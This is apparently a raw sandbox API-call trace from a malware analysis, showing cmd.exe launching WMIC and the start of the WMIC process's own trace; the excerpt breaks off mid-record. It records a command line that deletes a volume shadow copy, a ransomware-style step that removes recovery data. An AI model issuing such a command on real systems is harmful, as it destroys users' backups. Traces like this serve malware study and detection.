lpFindFileData=0x26f400*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x53000152, cFileName="Users", cAlternateFileName="")) returned 0x36b870 [0119.867] FindClose (in: hFindFile=0x36b870 | out: hFindFile=0x36b870) returned 1 [0119.868] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x26f400 | out: lpFindFileData=0x26f400*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x53000152, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x36b870 [0119.868] FindClose (in: hFindFile=0x36b870 | out: hFindFile=0x36b870) returned 1 [0119.868] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0119.868] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x26f400 | out: lpFindFileData=0x26f400*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2516f480, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x2516f480, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x53000152, cFileName="Desktop", cAlternateFileName="")) returned 0x36b870 [0119.868] FindClose (in: hFindFile=0x36b870 | out: hFindFile=0x36b870) returned 1 [0119.868] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0119.868] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0119.868] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0119.868] GetProcessHeap () returned 0x350000 [0119.868] HeapFree (in: hHeap=0x350000, dwFlags=0x0, lpMem=0x36ad60 | out: hHeap=0x350000) returned 1 [0119.868] GetEnvironmentStringsW () returned 0x36b870* [0119.869] GetProcessHeap () returned 0x350000 [0119.869] RtlAllocateHeap (HeapHandle=0x350000, Flags=0x8, Size=0xae8) returned 0x36c360 [0119.869] FreeEnvironmentStringsW (penv=0x36b870) returned 1 [0119.869] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4ac6c0a0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0119.869] GetProcessHeap () returned 0x350000 [0119.869] HeapFree (in: hHeap=0x350000, dwFlags=0x0, lpMem=0x36b800 | out: hHeap=0x350000) returned 1 [0119.869] GetProcessHeap () returned 0x350000 [0119.869] RtlAllocateHeap (HeapHandle=0x350000, Flags=0x8, Size=0x4016) returned 0x36ce50 [0119.869] GetProcessHeap () returned 0x350000 [0119.869] RtlAllocateHeap (HeapHandle=0x350000, Flags=0x8, Size=0xe4) returned 0x369680 [0119.869] GetProcessHeap () returned 0x350000 [0119.869] HeapFree (in: hHeap=0x350000, dwFlags=0x0, lpMem=0x36ce50 | out: hHeap=0x350000) returned 1 [0119.869] GetConsoleOutputCP () returned 0x1b5 [0119.870] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4ac6bfe0 | out: lpCPInfo=0x4ac6bfe0) returned 1 [0119.870] GetUserDefaultLCID () returned 0x409 [0119.870] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4ac67b50, cchData=8 | out: lpLCData=":") returned 2 [0119.870] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x26f800, cchData=128 | out: lpLCData="0") returned 2 [0119.870] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x26f800, cchData=128 | out: lpLCData="0") returned 2 [0119.870] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x26f800, cchData=128 | out: lpLCData="1") returned 2 [0119.870] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4ac7a740, cchData=8 | out: lpLCData="/") returned 2 [0119.870] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4ac7a4a0, cchData=32 | out: lpLCData="Mon") returned 4 [0119.871] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4ac7a460, cchData=32 | out: lpLCData="Tue") returned 4 [0119.871] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4ac7a420, cchData=32 | out: lpLCData="Wed") returned 4 [0119.871] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4ac7a3e0, cchData=32 | out: lpLCData="Thu") returned 4 [0119.871] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4ac7a3a0, cchData=32 | out: lpLCData="Fri") returned 4 [0119.871] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4ac7a360, cchData=32 | out: lpLCData="Sat") returned 4 [0119.871] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4ac7a700, cchData=32 | out: lpLCData="Sun") returned 4 [0119.871] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4ac67b40, cchData=8 | out: lpLCData=".") returned 2 [0119.871] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4ac7a4e0, cchData=8 | out: lpLCData=",") returned 2 [0119.871] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0119.872] GetProcessHeap () returned 0x350000 [0119.872] RtlAllocateHeap (HeapHandle=0x350000, Flags=0x0, Size=0x20c) returned 0x3697e0 [0119.872] GetConsoleTitleW (in: lpConsoleTitle=0x3697e0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0119.872] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77940000 [0119.872] GetProcAddress (hModule=0x77940000, lpProcName="CopyFileExW") returned 0x779523d0 [0119.872] GetProcAddress (hModule=0x77940000, lpProcName="IsDebuggerPresent") returned 0x77948290 [0119.873] GetProcAddress (hModule=0x77940000, lpProcName="SetConsoleInputExeNameW") returned 0x779517e0 [0119.873] GetProcessHeap () returned 0x350000 [0119.873] RtlAllocateHeap (HeapHandle=0x350000, Flags=0x8, Size=0x4012) returned 0x36ce50 [0119.873] GetProcessHeap () returned 0x350000 [0119.873] HeapFree (in: hHeap=0x350000, dwFlags=0x0, lpMem=0x36ce50 | out: hHeap=0x350000) returned 1 [0119.876] _wcsicmp (_String1="C:\\Windows\\System32\\wbem\\WMIC.exe", _String2=")") returned 58 [0119.876] _wcsicmp (_String1="FOR", _String2="C:\\Windows\\System32\\wbem\\WMIC.exe") returned 3 [0119.876] _wcsicmp (_String1="FOR/?", _String2="C:\\Windows\\System32\\wbem\\WMIC.exe") returned 3 [0119.876] _wcsicmp (_String1="IF", _String2="C:\\Windows\\System32\\wbem\\WMIC.exe") returned 6 [0119.876] _wcsicmp (_String1="IF/?", _String2="C:\\Windows\\System32\\wbem\\WMIC.exe") returned 6 [0119.876] _wcsicmp (_String1="REM", _String2="C:\\Windows\\System32\\wbem\\WMIC.exe") returned 15 [0119.876] _wcsicmp (_String1="REM/?", _String2="C:\\Windows\\System32\\wbem\\WMIC.exe") returned 15 [0119.876] GetProcessHeap () returned 0x350000 [0119.876] RtlAllocateHeap (HeapHandle=0x350000, Flags=0x8, Size=0xb0) returned 0x369a00 [0119.876] GetProcessHeap () returned 0x350000 [0119.876] RtlAllocateHeap (HeapHandle=0x350000, Flags=0x8, Size=0x54) returned 0x369ac0 [0119.879] GetProcessHeap () returned 0x350000 [0119.879] RtlAllocateHeap (HeapHandle=0x350000, Flags=0x8, Size=0x9e) returned 0x369b20 [0119.880] GetConsoleTitleW (in: lpConsoleTitle=0x26f710, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0119.880] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0119.880] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0119.880] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x26f2a0, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x26f280, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x26f280*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0119.880] GetProcessHeap () returned 0x350000 [0119.880] RtlAllocateHeap (HeapHandle=0x350000, Flags=0x8, Size=0x218) returned 0x369bd0 [0119.881] GetProcessHeap () returned 0x350000 [0119.881] RtlAllocateHeap (HeapHandle=0x350000, Flags=0x8, Size=0xe2) returned 0x369df0 [0119.881] _wcsnicmp (_String1="C:\\W", _String2="cmd ", _MaxCount=0x4) returned -51 [0119.881] GetProcessHeap () returned 0x350000 [0119.881] RtlAllocateHeap (HeapHandle=0x350000, Flags=0x8, Size=0x420) returned 0x351320 [0119.881] SetErrorMode (uMode=0x0) returned 0x8001 [0119.881] SetErrorMode (uMode=0x1) returned 0x0 [0119.881] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\wbem\\.", nBufferLength=0x208, lpBuffer=0x351330, lpFilePart=0x26efa0 | out: lpBuffer="C:\\Windows\\System32\\wbem", lpFilePart=0x26efa0*="wbem") returned 0x18 [0119.881] SetErrorMode (uMode=0x8001) returned 0x1 [0119.881] GetProcessHeap () returned 0x350000 [0119.881] RtlReAllocateHeap (Heap=0x350000, Flags=0x0, Ptr=0x351320, Size=0x54) returned 0x351320 [0119.881] GetProcessHeap () returned 0x350000 [0119.881] RtlSizeHeap (HeapHandle=0x350000, Flags=0x0, MemoryPointer=0x351320) returned 0x54 [0119.881] NeedCurrentDirectoryForExePathW (ExeName="C:\\Windows\\System32\\wbem\\.") returned 1 [0119.882] GetProcessHeap () returned 0x350000 [0119.882] RtlAllocateHeap (HeapHandle=0x350000, Flags=0x8, Size=0x48) returned 0x369ee0 [0119.882] GetProcessHeap () returned 0x350000 [0119.882] RtlAllocateHeap (HeapHandle=0x350000, Flags=0x8, Size=0x7c) returned 0x369f30 [0119.882] GetProcessHeap () returned 0x350000 [0119.882] RtlReAllocateHeap (Heap=0x350000, Flags=0x0, Ptr=0x369f30, Size=0x48) returned 0x369f30 [0119.882] GetProcessHeap () returned 0x350000 [0119.882] RtlSizeHeap (HeapHandle=0x350000, Flags=0x0, MemoryPointer=0x369f30) returned 0x48 [0119.882] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4ac5f360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0119.882] GetProcessHeap () returned 0x350000 [0119.882] RtlAllocateHeap (HeapHandle=0x350000, Flags=0x8, Size=0xe8) returned 0x369f90 [0119.886] GetProcessHeap () returned 0x350000 [0119.886] RtlReAllocateHeap (Heap=0x350000, Flags=0x0, Ptr=0x369f90, Size=0x7e) returned 0x369f90 [0119.886] GetProcessHeap () returned 0x350000 [0119.886] RtlSizeHeap (HeapHandle=0x350000, Flags=0x0, MemoryPointer=0x369f90) returned 0x7e [0119.887] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0119.888] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\wbem\\WMIC.exe", fInfoLevelId=0x1, lpFindFileData=0x26ed10, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26ed10) returned 0x36a020 [0119.888] GetProcessHeap () returned 0x350000 [0119.888] RtlAllocateHeap (HeapHandle=0x350000, Flags=0x0, Size=0x28) returned 0x3646c0 [0119.888] FindClose (in: hFindFile=0x36a020 | out: hFindFile=0x36a020) returned 1 [0119.888] _wcsicmp (_String1=".exe", _String2=".CMD") returned 2 [0119.888] _wcsicmp (_String1=".exe", _String2=".BAT") returned 3 [0119.888] GetConsoleTitleW (in: lpConsoleTitle=0x26f260, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0119.888] InitializeProcThreadAttributeList (in: lpAttributeList=0x26f018, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x26efd8 | out: lpAttributeList=0x26f018, lpSize=0x26efd8) returned 1 [0119.888] UpdateProcThreadAttribute (in: lpAttributeList=0x26f018, dwFlags=0x0, Attribute=0x60001, lpValue=0x26efc8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x26f018, lpPreviousValue=0x0) returned 1 [0119.888] GetStartupInfoW (in: lpStartupInfo=0x26f130 | out: lpStartupInfo=0x26f130*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1, hStdOutput=0x0, hStdError=0x0)) [0119.888] GetProcessHeap () returned 0x350000 [0119.888] RtlAllocateHeap (HeapHandle=0x350000, Flags=0x8, Size=0x20) returned 0x3646f0 [0119.889] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0119.889] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0119.889] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0119.889] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0119.889] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0119.889] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0119.889] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0119.889] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0119.889] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0119.889] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0119.889] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0119.889] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0119.889] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0119.889] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0119.889] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0119.889] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0119.889] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0119.889] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0119.889] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0119.889] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0119.889] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0119.889] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0119.889] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0119.889] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0119.889] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0119.889] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0119.889] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0119.889] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0119.890] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0119.890] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0119.890] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0119.890] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0119.890] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0119.890] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0119.890] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0119.890] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0119.890] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0119.890] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0119.890] GetProcessHeap () returned 0x350000 [0119.890] HeapFree (in: hHeap=0x350000, dwFlags=0x0, lpMem=0x3646f0 | out: hHeap=0x350000) returned 1 [0119.890] GetProcessHeap () returned 0x350000 [0119.890] RtlAllocateHeap (HeapHandle=0x350000, Flags=0x8, Size=0x12) returned 0x368a30 [0119.890] lstrcmpW (lpString1="\\WMIC.exe", lpString2="\\XCOPY.EXE") returned -1 [0119.891] CreateProcessW (in: lpApplicationName="C:\\Windows\\System32\\wbem\\WMIC.exe", lpCommandLine="C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{5555A914-627B-4AF5-A342-EC1A6421363A}'\" delete", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x26f050*(cb=0x70, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{5555A914-627B-4AF5-A342-EC1A6421363A}'\" delete", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x26f000 | out: lpCommandLine="C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{5555A914-627B-4AF5-A342-EC1A6421363A}'\" delete", lpProcessInformation=0x26f000*(hProcess=0x54, hThread=0x50, dwProcessId=0xb60, dwThreadId=0xb74)) returned 1 [0119.899] CloseHandle (hObject=0x50) returned 1 [0119.899] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0119.899] GetProcessHeap () returned 0x350000 [0119.899] HeapFree (in: hHeap=0x350000, dwFlags=0x0, lpMem=0x36c360 | out: hHeap=0x350000) returned 1 [0119.899] GetEnvironmentStringsW () returned 0x36ad60* [0119.900] GetProcessHeap () returned 0x350000 [0119.900] RtlAllocateHeap (HeapHandle=0x350000, Flags=0x8, Size=0xae8) returned 0x36b850 [0119.900] FreeEnvironmentStringsW (penv=0x36ad60) returned 1 [0119.900] WaitForSingleObject (hHandle=0x54, dwMilliseconds=0xffffffff) returned 0x0 [0121.273] GetExitCodeProcess (in: hProcess=0x54, lpExitCode=0x26ef48 | out: lpExitCode=0x26ef48*=0x0) returned 1 [0121.273] CloseHandle (hObject=0x54) returned 1 [0121.273] _vsnwprintf (in: _Buffer=0x26f1b8, _BufferCount=0x13, _Format="%08X", _ArgList=0x26ef58 | out: _Buffer="00000000") returned 8 [0121.273] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0121.273] GetProcessHeap () returned 0x350000 [0121.273] HeapFree (in: hHeap=0x350000, dwFlags=0x0, lpMem=0x36b850 | out: hHeap=0x350000) returned 1 [0121.273] GetEnvironmentStringsW () returned 0x36ad60* [0121.273] GetProcessHeap () returned 0x350000 [0121.273] RtlAllocateHeap (HeapHandle=0x350000, Flags=0x8, Size=0xb0e) returned 0x36b880 [0121.274] FreeEnvironmentStringsW (penv=0x36ad60) returned 1 [0121.274] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0121.274] GetProcessHeap () returned 0x350000 [0121.274] HeapFree (in: hHeap=0x350000, dwFlags=0x0, lpMem=0x36b880 | out: hHeap=0x350000) returned 1 [0121.274] GetEnvironmentStringsW () returned 0x36ad60* [0121.274] GetProcessHeap () returned 0x350000 [0121.274] RtlAllocateHeap (HeapHandle=0x350000, Flags=0x8, Size=0xb0e) returned 0x36b880 [0121.274] FreeEnvironmentStringsW (penv=0x36ad60) returned 1 [0121.274] GetProcessHeap () returned 0x350000 [0121.274] HeapFree (in: hHeap=0x350000, dwFlags=0x0, lpMem=0x368a30 | out: hHeap=0x350000) returned 1 [0121.274] DeleteProcThreadAttributeList (in: lpAttributeList=0x26f018 | out: lpAttributeList=0x26f018) [0121.274] _get_osfhandle (_FileHandle=1) returned 0x7 [0121.274] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0121.274] _get_osfhandle (_FileHandle=1) returned 0x7 [0121.274] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4ac5e194 | out: lpMode=0x4ac5e194) returned 1 [0121.275] _get_osfhandle (_FileHandle=0) returned 0x3 [0121.275] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4ac5e198 | out: lpMode=0x4ac5e198) returned 1 [0121.275] SetConsoleInputExeNameW () returned 0x1 [0121.275] GetConsoleOutputCP () returned 0x1b5 [0121.275] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4ac6bfe0 | out: lpCPInfo=0x4ac6bfe0) returned 1 [0121.275] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0121.275] exit (_Code=0) Process: id = "45" image_name = "wmic.exe" filename = "c:\\windows\\system32\\wbem\\wmic.exe" page_root = "0x26599000" os_pid = "0xb60" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "44" os_parent_pid = "0x634" cmd_line = "C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{5555A914-627B-4AF5-A342-EC1A6421363A}'\" delete" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 238 os_tid = 0xb74 [0119.943] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x16fc10 | out: lpSystemTimeAsFileTime=0x16fc10*(dwLowDateTime=0x4eebd910, dwHighDateTime=0x1d68245)) [0119.943] GetCurrentProcessId () returned 0xb60 [0119.943] GetCurrentThreadId () returned 0xb74 [0119.943] GetTickCount () returned 0x1153831 [0119.943] QueryPerformanceCounter (in: lpPerformanceCount=0x16fc18 | out: lpPerformanceCount=0x16fc18*=23983587197) returned 1 [0119.943] GetModuleHandleW (lpModuleName=0x0) returned 0xff8b0000 [0119.943] __set_app_type (_Type=0x1) [0119.943] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xff8fced0) returned 0x0 [0119.943] __wgetmainargs (in: _Argc=0xff922380, _Argv=0xff922390, _Env=0xff922388, _DoWildCard=0, _StartInfo=0xff92239c | out: _Argc=0xff922380, _Argv=0xff922390, _Env=0xff922388) returned 0 [0119.943] ??0CHString@@QEAA@XZ () returned 0xff922ab0 [0119.944] malloc (_Size=0x30) returned 0x415a50 [0119.944] malloc (_Size=0x70) returned 0x415a90 [0119.944] malloc (_Size=0x50) returned 0x417d30 [0119.944] malloc (_Size=0x30) returned 0x417d90 [0119.944] malloc (_Size=0x48) returned 0x417dd0 [0119.944] malloc (_Size=0x30) returned 0x417e20 [0119.944] malloc (_Size=0x30) returned 0x417e60 [0119.944] ??0CHString@@QEAA@XZ () returned 0xff922f58 [0119.944] malloc (_Size=0x30) returned 0x417ea0 [0119.944] ?Empty@CHString@@QEAAXXZ () returned 0x7fef4af482c [0119.944] SetConsoleCtrlHandler (HandlerRoutine=0xff8f5724, Add=1) returned 1 [0119.944] _onexit (_Func=0xff90f378) returned 0xff90f378 [0119.944] _onexit (_Func=0xff90f490) returned 0xff90f490 [0119.944] _onexit (_Func=0xff90f4d0) returned 0xff90f4d0 [0119.944] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0119.944] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0119.947] CoInitializeSecurity (pSecDesc=0x0, cAuthSvc=-1, asAuthSvc=0x0, pReserved1=0x0, dwAuthnLevel=0x1, dwImpLevel=0x3, pAuthList=0x0, dwCapabilities=0x0, pReserved3=0x0) returned 0x0 [0119.955] CoCreateInstance (in: rclsid=0xff8b73a0*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0xff8b7370*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0xff922940 | out: ppv=0xff922940*=0x1e21390) returned 0x0 [0119.961] GetCurrentProcess () returned 0xffffffffffffffff [0119.961] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x28, TokenHandle=0x16f9e0 | out: TokenHandle=0x16f9e0*=0xf4) returned 1 [0119.961] GetTokenInformation (in: TokenHandle=0xf4, TokenInformationClass=0x3, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x16f9d8 | out: TokenInformation=0x0, ReturnLength=0x16f9d8) returned 0 [0119.961] malloc (_Size=0x118) returned 0x4169a0 [0119.962] GetTokenInformation (in: TokenHandle=0xf4, TokenInformationClass=0x3, TokenInformation=0x4169a0, TokenInformationLength=0x118, ReturnLength=0x16f9d8 | out: TokenInformation=0x4169a0, ReturnLength=0x16f9d8) returned 1 [0119.962] AdjustTokenPrivileges (in: TokenHandle=0xf4, DisableAllPrivileges=0, NewState=0x4169a0*(PrivilegesCount=0x17, Privileges=((Luid.LowPart=0x5, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x9), (Luid.LowPart=0x2, Luid.HighPart=10, Attributes=0x0), (Luid.LowPart=0xb, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0xd), (Luid.LowPart=0x2, Luid.HighPart=14, Attributes=0x0), (Luid.LowPart=0xf, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x12), (Luid.LowPart=0x2, Luid.HighPart=19, Attributes=0x0), (Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x17), (Luid.LowPart=0x3, Luid.HighPart=24, Attributes=0x0), (Luid.LowPart=0x19, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x1d), (Luid.LowPart=0x3, Luid.HighPart=30, Attributes=0x0), (Luid.LowPart=0x21, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x23), (Luid.LowPart=0x2, Luid.HighPart=1513556323, Attributes=0xf3b7), (Luid.LowPart=0x0, Luid.HighPart=4292320, Attributes=0x0), (Luid.LowPart=0x64006e, Luid.HighPart=7798895, Attributes=0x3b0073), (Luid.LowPart=0x57005c, 